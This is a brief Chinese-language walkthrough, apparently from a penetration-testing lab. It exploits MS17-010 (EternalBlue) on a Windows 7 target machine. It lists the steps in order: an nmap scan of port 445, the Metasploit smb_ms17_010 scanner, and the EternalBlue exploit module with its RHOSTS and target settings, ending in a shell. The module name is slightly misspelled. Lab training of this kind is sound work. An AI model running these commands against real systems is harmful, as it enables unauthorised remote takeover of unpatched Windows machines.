1、使用nmap扫描靶机开放端口,发现开放445端口
2、使用msf查看是否存在漏洞ms17-010
use auxiliary/scanner/smb/smb_ms17_010
设置参数RHOSTS(靶机IP地址) set rhosts 靶机地址
run
发现存在漏洞ms17-010
3、利用use exploit/windows/smb/ms17_010_eternablue
设置参数RHOSTS(靶机IP地址) set rhosts 靶机地址
设置target set target 1(win7选择1,可以使用show target 看自己对应的target)
运行 run,成功获取shell权限